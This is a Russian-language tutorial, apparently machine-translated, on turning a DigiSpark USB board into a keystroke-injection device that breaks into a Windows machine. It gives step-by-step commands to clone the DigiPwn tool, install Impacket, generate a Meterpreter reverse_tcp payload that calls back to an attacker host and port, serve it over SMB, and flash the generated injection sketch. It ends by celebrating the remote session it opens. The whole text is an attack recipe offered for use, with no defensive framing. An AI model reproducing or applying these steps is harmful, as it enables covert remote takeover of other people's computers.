Оглавление:
2025 Автор: John Day | [email protected]. Последнее изменение: 2025-01-13 06:58
Так что мы здесь делаем?
DigiSpark - это небольшой инструмент разработки на базе Arduino, который может действовать как ввод с клавиатуры HID. Сегодня мы манипулируем этим устройством, чтобы проникнуть в операционную систему Windows!
Запасы
IDE Arduino
Windows машина
DigiSpark
Metasploit Framework
Python 2.7 (Примечание: вам нужен Python 2.7, не подходите для других версий)
удар
Головной мозг! Это помогает
Шаг 1. Клонируйте репозиторий DigiPwn
Клонировать DigiPwn в репозиторий GitHub с помощью
git clone
Теперь смените каталог на DigiPwn с помощью
cd DigiPwn /
Шаг 2. Установите Impacket [модули, необходимые для Python]
Этот модуль необходим для запуска SMB-сервера, необходимого для библиотеки полезной нагрузки.
sudo apt-get install python-impacket
Или вы можете скачать библиотеку impacket и установить ее отсюда.
Шаг 3: Сгенерируем полезную нагрузку
Запустить
python DigiPwn.py [HOST] [PORT] [PAYLOAD] [OUTPUT FILE] [формат]
бывший
python DigiPwn.py 192.168.1.2 8080 окна / meterpreter / reverse_tcp win.vbs win.vbs
Теперь вас спросят, запускать ли stager и SMB-сервер. Нажмите y и нажмите Enter
Шаг 4: Теперь загрузите код в Arduino
Перед загрузкой нам нужно убедиться, что плата DigiSpark установлена в Arduino, чтобы сделать это, посмотрите здесь.
после этого загрузите сгенерированный скриптом файл keystroke_inject.ino. После этого вы готовы к
Шаг 5: Пора подключать ребенка
Подключите DigiSpark сейчас и подождите 10 секунд.
БУМ Открыта сессия meterpreter!